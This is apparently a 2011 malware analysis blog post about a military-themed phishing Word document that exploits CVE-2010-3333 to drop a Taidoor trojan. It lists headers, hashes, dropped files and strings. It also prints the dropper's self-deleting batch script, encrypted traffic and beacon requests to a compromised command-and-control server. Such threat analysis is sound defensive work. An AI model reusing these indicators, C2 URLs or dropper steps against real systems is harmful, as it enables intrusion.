contagio: Jun 1 CVE-2010-3333 DOC 2011 Insider's Guide to Military Benefits from compromised louisvilleheartsurgery.com w Trojan Taidoor

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3333 Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability

General File Information

File 2011 Insider's Guide to Military Benefits .doc
File Size 92715 bytes
MD5 f520c8671ddb9965bbf541f20635ef30
Distribution Email Attachment

The trojan within a word document was sent via mail.louisvilleheartsurgery.com (66.147.51.202), which appears to be a legitimate mail server of University of Louisville surgery program, which is outsourced to/hosted at Nuvox / Windstream Email hosting. The server must be misconfigured or compromised and is being actively used as a relay for phishing.(I have other examples of phish mail sent via that server and I will post them as soon as I can)

Download

Download the original document, all the dropped files and pcap as a password protected archive (contact me if you need the password)

Original Message

-----Original Message-----
From: Steve Ballinger [mailto:order@mail.milmall.com]
Sent: Wednesday, June 01, 2011 12:12 PM
To: xxxxxxxxxxxxxxx
Subject: 2011 Insider's Guide to Military Benefits

2011 Insider's Guide to Military Benefits - The Military Times Handbook for Military Life

By: New Military Times
Includes up to date essential information on:

Military Pay and Benefits
Community Resources For The Military
Education, Military Health Care
Housing
Leisure
Moving
Military Retirement
Separation

Message Headers

Received: (qmail 11282 invoked from network); 1 Jun 2011 16:12:10 -0000
Received: from mail.louisvilleheartsurgery.com (HELO ucsamd.com) (66.147.51.202)
by xxxxxxxxxxxxxxxxxxxxxxx
Received: from UCSADC1 ([192.168.20.2]) by ucsamd.com with Microsoft SMTPSVC(6.0.3790.4675);
Wed, 1 Jun 2011 12:12:09 -0400
Subject: 2011 Insider's Guide to Military Benefits
Date: Wed, 1 Jun 2011 12:12:08 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01CC204B.B2997820"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4721
From: "Steve Ballinger"
To: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Mailer: Microsoft Outlook, Build 10.0.2627
Return-Path: order@mail.milmall.com
Message-ID:
X-OriginalArrivalTime: 01 Jun 2011 16:12:09.0066 (UTC) FILETIME=[A86A24A0:01CC2076]

Sender

IP numbers of host (1) 66.147.51.202

PTRs of IP numbers (1) mail.louisvilleheartsurgery.com

Host names sharing IP with A records (1) mail.louisvilleheartsurgery.com

A of PTR of A (1) 66.147.51.202

The sender email address was used order@mail.milmall.com, which is a spoof and is supposed to look like an address used by Mill-Mall - a military bookstore

Automated Scans

2011 Insider's Guide to Military Benefits .doc
http://www.virustotal.com/file-scan/report.html?id=60fd85657464c1388dd26cd336982f2e242959c828a696672ef9b1945dee62df-1307983543
Submission date: 2011-06-13 16:45:43 (UTC)
Result: 19/ 42 (45.2%)
AhnLab-V3 2011.06.13.00 2011.06.13 Dropper/Cve-2010-3333
AntiVir 7.11.9.167 2011.06.13 EXP/CVE-2010-3333
Avast 4.8.1351.0 2011.06.13 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.06.13 RTF:CVE-2010-3333
BitDefender 7.2 2011.06.13 Exploit.RTF.Gen
ClamAV 0.97.0.0 2011.06.13 BC.Exploit.CVE_2010_3333
Commtouch 5.3.2.6 2011.06.13 CVE-2010-3333!Camelot
DrWeb 5.0.2.03300 2011.06.13 Exploit.Rtf.based
F-Secure 9.0.16440.0 2011.06.13 Exploit.RTF.Gen
Fortinet 4.2.257.0 2011.06.11 Data/CVE20103333.A!exploit
GData 22 2011.06.13 Exploit.RTF.Gen
Ikarus T3.1.1.104.0 2011.06.13 Exploit.Win32.CVE-2010
Microsoft 1.6903 2011.06.13 Exploit:Win32/CVE-2010-3333
NOD32 6203 2011.06.13 Win32/Exploit.CVE-2010-3333
PCTools 7.0.3.5 2011.06.10 HeurEngine.MaliciousExploit
Symantec 20111.1.0.186 2011.06.13 Bloodhound.Exploit.366
TrendMicro 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AE
TrendMicro-HouseCall 9.200.0.1012 2011.06.13 TROJ_ARTIEF.AE
VIPRE 9572 2011.06.13 Exploit.MSWord.CVE-2010-3333.c (v)
MD5 : f520c8671ddb9965bbf541f20635ef30

Created files

This appears to be a fairly common trojan, it is characterized by traffic it generates and in some cases being detected as Trojan Tadoor - see example from the same sender here

http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5 char string
xxxxxx is a 6 char changing string
yyyyyyyyyyyy - 12 char more or less constant string

Created files

%Temp%\5.doc 0392F0E2B48D0F1364673F7305A04C57

%Temp%\~DF3055.bat DABFCF9C8BA049546158F259C8F52179
%Temp%\~Svchost.exe d245958a8d1545e14a3a2dc3f212a5e4

created and deleted files
%userprofile%\desktop\~winhlp.tmp D679CFCD2096E351DBBBB968B52B6C3C
All Users\Application Data\iosys

iosys - the trojan dropper

iosys gets dropped by the original word document in the same location. It creates all other files mentioned in the Created Files section of this post.

Files added
----------------------------------
C:\WINDOWS\Prefetch\IOSYS.EXE-078F7196.pf - iosys runs
C:\Documents and Settings\mila\Local Settings\Temp\5.doc - creates clean decoy file
C:\Documents and Settings\mila\Local Settings\Temp\~DF3055.bat - creates batch file
C:\Documents and Settings\mila\Local Settings\Temp\~Svchost.exe - creates ~Svchost.exe
C:\WINDOWS\Prefetch\WINWORD.EXE-37F6AE09.pf - launches 5.doc

Files deleted
----------------------------------
C:\Documents and Settings\mila\Desktop\iosys ~DF3055.bat batch file deletes iosys and itself

iosys

Submission date: 2011-06-13 17:52:44 (UTC)
http://www.virustotal.com/file-scan/report.html?id=63a01a93eb991673239702dd404b7625c9cbad73a6aa112dd5461898248397ee-1307987564
Result: 15/ 42 (35.7%)
Compact Print results Antivirus Version Last Update Result
AntiVir 7.11.9.167 2011.06.13 TR/CryptRedol.17925.3.20
Avast 4.8.1351.0 2011.06.13 Win32:Trojan-gen
Avast5 5.0.677.0 2011.06.13 Win32:Trojan-gen
AVG 10.0.0.1190 2011.06.13 Generic22.BYNK.dropper
BitDefender 7.2 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
F-Secure 9.0.16440.0 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
GData 22 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Kaspersky 9.0.0.837 2011.06.13 Trojan.Win32.Sasfis.bkyb
Microsoft 1.6903 2011.06.13 VirTool:Win32/Injector.gen!BJ
NOD32 6203 2011.06.13 a variant of Win32/Injector.GUH
Norman 6.07.10 2011.06.13 W32/Malware.THEX.dropper
nProtect 2011-06-13.02 2011.06.13 Dropped:Trojan.CryptRedol.Gen.3
Rising 23.62.00.03 2011.06.13 Suspicious
VBA32 3.12.16.1 2011.06.13 TrojanDownloader.Rubinurd.f
VIPRE 9572 2011.06.13 Trojan.Win32.Generic!BT
Additional informationShow all
MD5 : 6b390f0e5db546090d43e37e928242ae

Some strings from iosys

O&"4C
/9RjxidV7
2(R~M
&Xntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
abcde
W[SO
KSKS
{skc[SKC
wurpnk
hecXVS
& 6"
5.doc
Dwf.qc`

Unicode Strings:
---------------------------------------------------------------------------
(null)
         (((((                  H
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Translation
Root Entry
SummaryInformation
DocumentSummaryInformation
WordDocument
FCAA-VA Meeting
Cstro3
Normal.dotm
Lura Harrison
Microsoft Office Word
Fairfax County Government
KSOProductBuildVer
2052-6.6.0.2461
Footer Char
Balloon Text Char
0Table
Data
2011 Insider's Guide to Military Benefits - The Military Times Handbook for Military Life
By: Military Times
Includes up to date essential information on:
Military Pay and Benefits
Community Resources For The Military
Education, Military Health Care
Housing
Leisure
Moving
Military Retirement
Separation
http://www.mil-mall.com/2011-guide-to-militry-benefits.html?utm_source=marketplace
$5.00
Quantity   1 - 10     11 - 25     26 - 100     101 - 500     501+
Price      $5.00      $4.50       $4.00        $3.00         $2.00
Mil-Mall / 6883 Commercial Drive / Springfield, VA 22159 / Toll Free Inside U.S. 888-750-8099 / Outside U.S. 01-703-750-8099
PAGE
PAGE
List Paragraph
Times New Roman
Cambria Math
Symbol
Arial
Courier New
Wingdings
Tahoma
Normal.dotm
FCAA-VA Meeting
Cstro3
Lura Harrison
Z&!),.:;?]}

5.doc - decoy clean file

The document properties
FCAA-VA Meeting
Cstro3
Lura Harrison FCAA-VA Meeting, indicating that it was created by Fairfax County Government, however, the custom tab shows KSOProductBuildVer, which means it was created using Kingsoft Office

Kingsoft Office, commonly known simply as KSO, developed by Zhuhai based Chinese software developer Kingsoft, is an alternative to Microsoft Office. The product has had a long history of development in China, where it is still sold as WPS Office. "Kingsoft Office" is the company's attempt to crack, primarily, the Western and Japanese markets. Since Kingsoft Office 2005, the user interface bears resemblance to the Microsoft Office products, and the suite reads and writes the files generated by Office in addition to its native documents. The personal edition is free for download.

~DF3055.bat and winhp.tmp

contents of the file:

@echo off

@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
....
@echo 123>>~winhp.tmp repeated exactly 1000 times
.....

@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@del ~winhp.tmp
del "c:\docume~1\alluse~1\applic~1\iosys"
"C:\DOCUME~1\mila\LOCALS~1\Temp\5.doc"
"C:\DOCUME~1\mila\LOCALS~1\Temp\~Svchost.exe"
del %0
@exit

~winhp.tmp contains nothing but 1000 row of 123. Reasons unclear, perhaps some sort of timer

~Svchost.exe

d245958a8d1545e14a3a2dc3f212a5e4
Submission date: 2011-06-12 15:01:53 (UTC)
http://www.virustotal.com/file-scan/report.html?id=0a9229f957257da1d231dfc75ba59e4d929deffed5293fca53d5b571086bbfe8-1307890913
Result: 29 /42 (69.0%)
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2011.06.12.02 2011.06.12 Trojan/Win32.Sasfis
AntiVir 7.11.9.159 2011.06.11 TR/CryptRedol.17925.3.20
Antiy-AVL 2.0.3.7 2011.06.12 Trojan/Win32.Sasfis.gen
Avast 4.8.1351.0 2011.06.12 Win32:Trojan-gen
Avast5 5.0.677.0 2011.06.12 Win32:Trojan-gen
AVG 10.0.0.1190 2011.06.12 Generic22.BYNK
BitDefender 7.2 2011.06.12 Trojan.CryptRedol.Gen.3
CAT-QuickHeal 11.00 2011.06.12 Trojan.Sasfis.bkyb
Comodo 9042 2011.06.12 UnclassifiedMalware
eSafe 7.0.17.0 2011.06.09 Win32.CryptRedol
F-Secure 9.0.16440.0 2011.06.12 Trojan.CryptRedol.Gen.3
Fortinet 4.2.257.0 2011.06.11 W32/Sasfis.BKYB!tr
GData 22 2011.06.12 Trojan.CryptRedol.Gen.3
Ikarus T3.1.1.104.0 2011.06.12 Trojan.SuspectCRC
Kaspersky 9.0.0.837 2011.06.12 Trojan.Win32.Sasfis.bkyb
McAfee 5.400.0.1158 2011.06.12 Artemis!D245958A8D15
McAfee-GW-Edition 2010.1D 2011.06.12 Artemis!D245958A8D15
Microsoft 1.6903 2011.06.12 VirTool:Win32/Injector.gen!BJ
NOD32 6200 2011.06.12 Win32/TrojanDownloader.Agent.PTT
Norman 6.07.10 2011.06.12 W32/Malware.THEX
nProtect 2011-06-12.01 2011.06.12 Trojan.CryptRedol.Gen.3
Panda 10.0.3.5 2011.06.12 Trj/CI.A
PCTools 7.0.3.5 2011.06.10 Trojan.Gen
Rising 23.61.04.07 2011.06.10 Suspicious
Symantec 20111.1.0.186 2011.06.12 Suspicious.Cloud.5
TheHacker 6.7.0.1.228 2011.06.11 Trojan/Sasfis.bkyb
VBA32 3.12.16.1 2011.06.10 TrojanDownloader.Rubinurd.f
VIPRE 9561 2011.06.12 Trojan.Win32.Generic!BT
VirusBuster 14.0.76.0 2011.06.11 Trojan.Sasfis!BVoRVaO8XBA
MD5 : d245958a8d1545e14a3a2dc3f212a5e4

Strings excerpt

/9RjxidV7
2(R~M
&Xntdll.dll
NtUnmapViewOfSection
host.exe "
vices.exe "
%ProgramFiles%\Mcafee
abcde

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Adobe Systems, Inc.
FileDescription
Adobe? Flash? Player Installer/Uninstaller 10.1 r53 --- these ?? are broken unicode, I suppose
FileVersion
10,1,53,64
InternalName
Adobe? Flash? Player Installer/Uninstaller 10.1
LegalCopyright
Copyright ? 1996-2010 Adobe, Inc.
LegalTrademarks
Adobe? Flash? Player
OriginalFilename
FlashUtil.exe
ProductName
Flash? Player Installer/Uninstaller
ProductVersion
10,1,53,64
VarFileInfo
Translation

Language code of the file is displayed as English - United States en-us 1033 but the language ID is actually Chinese Simplified (The language ID is a word integer value made up of a primary language and its sublanguage which is defined by Windows. If the resource item is “language neutral” then this value is zero.)

Threatexpert analysis
http://www.threatexpert.com/report.aspx?md5=d245958a8d1545e14a3a2dc3f212a5e4

Registry Modifications

The following Registry Keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG

The newly created Registry Value is:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG]

Trace Level = ""

Other details

Analysis of the file resources indicate the following possible country of origin:

China

There was registered attempt to establish connection with the remote host. The connection details are:

Remote Host	Port Number
99.1.23.71	443

The data identified by the following URLs was then requested from the remote web server:

http://99.1.23.71/qfgkt.php?id=030696111D308D0E8D
http://99.1.23.71/qfgkt.php?id=013649111D308D0E8D
http://99.1.23.71/qfgkt.php?id=000041111D308D0E8D

Outbound traffic (potentially malicious)

There was an outbound traffic produced on port 443:

00000000 |
4193 7170 A528 1497 5037 E980 7EDE AEF7 | A.qp.(..P7..~...
00000010 | AFC1 B229 D55E 016F 7990 7849 F589 4B36 | ...).^.oy.xI..K6
00000020 | 0397 3479 2D6E 71D3 D10F E866 FE9B AB3E |
..4y-nq....f...>
00000030 | 4F5A 307D 3778 25CE 36F6 6A19 18F6 B11B | OZ0}7x%.6.j.....
00000040 | 35B5 46A1 6257 2485 9C54 0092 66E4 95E2 | 5.F.bW$..T..f...
00000050 | AEB4 AEA5 154A A454 1CCD 2C1C E72E 35F8 | .....J.T..,...5.
00000060 | 861D 37E5 F983 5635 76DE C932 73BE C405 | ..7...V5v..2s...
00000070 | EDB0 D0E8 1BF2 56A3 59E7 3DB9 5972 1778 | ......V.Y.=.Yr.x
00000080 | 017C 1041 DB18 725A 1B27 B7AB 1C09 29B7 | .|.A..rZ.'....).
00000090 | 312B 6EE6 13AB 37BE 8132 D8B5 64CD 0A2D | 1+n...7..2..d..-
000000A0 | 5CB7 BBDF 35A3 BB5F B85D 951D 6835 7083 | \...5.._.]..h5p.
000000B0 | 8F1D 523D 029C C1DD AF10 B830 1E05 2616 |
..R=.......0..&.
000000C0 | 5423 1C89 67B2 5C43 125D 8570 FD31 8EDF | T#..g.\C.].p.1..
000000D0 | 6B42 2B40 A1BF B40B 3C1C B8A0 F9D9 209B |
kB+@....<..... .
000000E0 | 2DDC 4D7C 6F44 3314 D6E8 DCFD 050E A5E3 | -.M|oD3.........
000000F0 | B4D1 7679 0F11 7049 10A7 5F94 6DD2 4FB5 | ..vy..pI.._.m.O.
00000100 | CEA8 0EA8 C4B7 1A00 0A94 1239 B6E5 2920 | ...........9..)
00000110 | 3EA1 43CE 826B D3D8 089F BAF5 95EC 63D0 |
>.C..k........c.
00000120 | 85F2 7FD7 B520 4F6E 38D5 1821 C7F0 2144 | ..... On8..!..!D
00000130 | C257 01AB 0574 9595 E780 2224 11E1 48A6 | .W...t...."$..H.
00000140 | 7CA1 AF53 3A59 C0E2 99A6 8CCD 3BBC 50EB | |..S:Y......;.P.
00000150 | C182 8EDF D7CE 4DD2 634C B60B A6FE D060 | ......M.cL.....`
00000160 | 173B 20E3 BEAD 37DF 3FA0 8A8D CDD2 6588 | .; ...7.?.....e.
00000170 | DE6F 4713 3C0F 9546 A463 5BA9 6EAE 5454 |
.oG.<..F.c[.n.TT
00000180 | D0CA 4E71 9E62 AE73 D492 E8A4 D836 5DF9 | ..Nq.b.s.....6].
00000190 | 4643 3AE1 51F2 146B A1D4 A5FF 4E3D 7EB1 | FC:.Q..k....N=~.
000001A0 | 79A9 C32F 93B8 0B70 E9F9 25DA B083 0522 | y../...p..%...."
000001B0 | B651 B760 4EBB 886D B38D 2183 EF63 8766 | .Q.`N..m..!..c.f
000001C0 | CD01 8B18 C267 FCB8 B9BD A9B1 3476 A969 | .....g......4v.i
000001D0 | CFE0 AF59 7496 CA52 8B6E 05AE CAAB 263D |
...Yt..R.n....&=
000001E0 | 6316 8569 8929 3128 3156 3680 2A2C 8E3E |
c..i.)1(1V6.*,.>
000001F0 | 5745 903D CE9B 9FB6 8A9F ECD2 A13D D7D8 | WE.=.........=..
00000200 | E254 773B D27F 825E E828 5D2C 2D03 5F4A | .Tw;...^.(],-._J
00000210 | AA22 6F88 EA7C EC1B 7A1B 86CB 5DF2 D00C | ."o..|..z...]...
00000220 | 3A4D A3C2 43C5 B8F4 BB2B ADF7 8989 79D5 | :M..C....+....y.
00000230 | DFC1 81D1 7869 C8A2 AA50 A75B 7E14 A288 | ....xi...P.[~...
00000240 | E36F C6DE D6B0 7A71 5B9B 497B F8A7 EB9B | .o....zq[.I{....
00000250 | 49B5 DEFC 7E5F 528B A6D7 C6EA B967 1EF6 | I...~_R......g..
00000260 | B245 D1D7 F36D DFB1 CF72 C493 1EDF 79A4 | .E...m...r....y.
00000270 | D5C1 A778 0A77 3826 1330 66FF 0199 CF94 |
...x.w8&.0f.....
00000280 | 73F3 02D0 0F89 3DF5 A758 5129 751D AFBF | s.....=..XQ)u...
00000290 | 8BFE 4577 CB18 8E9A 6BD1 21C9 B163 5AF2 | ..Ew....k.!..cZ.
000002A0 | 893F 8BB5 EA62 A777 6576 85DF 9E14 5F7E | .?...b.wev...._~
000002B0 | F198 A397 E66A 06E6 B2C0 7DA1 A788 67B7 | .....j....}...g.
000002C0 | 47BB 233D 8C92 956F 5415 A8CA 2DF0 5E5C | G.#=...oT...-.^\
000002D0 | FB99 8045 9D86 27B5 B533 5771 41D9 6A8B | ...E..'..3WqA.j.
000002E0 | 1A77 5166 F30F FE9D 7275 C84F 02F0 20A9 | .wQf....ru.O.. .
000002F0 | FDF1 C069 0EB6 6519 7024 789F 6625 31B2 | ...i..e.p$x.f%1.
00000300 | 10B6 8873 C5B7 1CED D92E 8ED1 BB2C 4911 | ...s.........,I.
00000310 | 9792 8BC9 99CD 6B7F 320A 2671 853F B3E7 |
......k.2.&q.?..
00000320 | DC22 6E45 F6A5 1168 2634 BD45 697F 5E17 |
."nE...h&4.Ei.^.
00000330 | A912 9167 ADD8 37F4 B810 3B48 7495 4819 | ...g..7...;Ht.H.
00000340 | F766 A04B AFD4 49D5 7D18 3DC1 D20B F953 | .f.K..I.}.=....S
00000350 | E9C1 96E2 DFD5 013B 1016 1304 2292 3568 | .......;....".5h
00000360 | 5F67 8834 E991 5B65 18E1 C345 7649 CF6F | _g.4..[e...EvI.o
00000370 | 2699 2A28 0B1B BCFC 355D C916 5EED 4A52 |
&.*(....5]..^.JR
00000380 | 21BE A937 D553 A1DF D27E 60A7 9088 FD6F | !..7.S...~`....o
00000390 | AD93 75F8 1AA7 DC8F D9FD 2757 F0DF EC22 | ..u.......'W..."
000003A0 | 87F7 43D4 4402 444D 8944 B8B2 392D 04A7 | ..C.D.DM.D..9-..
000003B0 | 445F 7E99 DC04 8F27 3587 1844 33AD 0A44 | D_~....'5..D3..D
000003C0 | C592 A4DB B3FD A85E EB1A B25C C85C F683 | .......^...\.\..
000003D0 | 8271 2A8A 80A0 87D5 4E9A 0F2E E5D7 1BD1 | .q*.....N.......
000003E0 | 5A9B 99A2 5825 FB46 21EC DF97 11DC 0387 | Z...X%.F!.......
000003F0 | 50E4 441F E94D 14BC AB15 B873 3F00 C580 | P.D..M.....s?...
00000400 | DB7A F64E 1185 207D F680 2A07 35E5 188D | .z.N.. }..*.5...
00000410 | 4F50 734A 8B5E C47A 9C48 F84D 6911 F667 | OPsJ.^.z.H.Mi..g
00000420 | D40E D9B3 144E 913A 6E09 CAA7 F26B E54A | .....N.:n....k.J
00000430 | 782E 18B8 1C0D B8DC D6B8 1476 D594 F868 | x..........v...h
00000440 | 81C2 F8EC AE12 8CB0 AFEB 167D 0689 476B | ...........}..Gk
00000450 | DE35 049B C262 753F 84E2 DFBD D05B 4746 | .5...bu?.....[GF
00000460 | D212 259D EC7D 4E40 AA41 9A34 3E6D 5F79 |
..%..}N@.A.4>m_y
00000470 | EB56 E15A 3083 BF9C FC8D E891 8F06 BF16 | .V.Z0...........
00000480 | 2412 9697 D403 6590 AF91 AA71 D307 72D9 | $.....e....q..r.
00000490 | 67FE 9039 1574 A28D FC5E DA52 29DA 3E07 |
g..9.t...^.R).>.
000004A0 | 7871 E601 97DC EB63 6BB6 8624 69F7 4E65 | xq.....ck..$i.Ne
000004B0 | 7796 59C0 6F2F D265 B22C 715B 920D 1A8B | w.Y.o/.e.,q[....
000004C0 | E9 | .

Traffic

CnC server
Download pcap file here

SSL to / from 99.1.23.71:443

examples
GET /wmssk.php?id=016180191138FEBC54 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71
Connection: Keep-Alive
Cache-Control: no-cache
GET /ldtxh.php?id=011340111D30541B71 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 99.1.23.71

Connection: Keep-Alive

99.1.23.71 an IIS compromised server, which belongs to Sun Country Medical Equipment

99.1.23.64 - 99.1.23.71
SUN COUNTRY MEDICAL EQUIPMENT-080827115120
Private Address
Plano, TX 75075 United States

IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com
IPAdmin ATT Internet Services
+1-800-648-1626
ipadmin@att.com

SBC-99-1-23-64-29-0808275145
Created: 2008-08-27
Updated: 2011-03-19
Source: whois.arin.net

Pages

Monday, June 13, 2011

Jun 1 CVE-2010-3333 DOC 2011 Insider's Guide to Military Benefits from compromised louisvilleheartsurgery.com w Trojan Taidoor